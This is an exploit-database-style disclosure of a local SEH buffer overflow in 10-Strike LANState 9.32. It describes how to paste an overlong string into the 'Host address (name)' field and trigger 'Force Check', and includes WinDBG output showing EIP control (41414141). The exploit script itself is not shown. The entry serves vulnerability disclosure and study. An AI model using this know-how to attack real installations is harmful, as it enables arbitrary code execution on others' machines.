Exploits / Vulnerability Discovered : 2020-04-01 |
Type : local |
Platform : windows
This exploit / vulnerability 10strike lanstate 9.32 force check buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
# Description:
# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH.
# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Rightclick on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results
# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???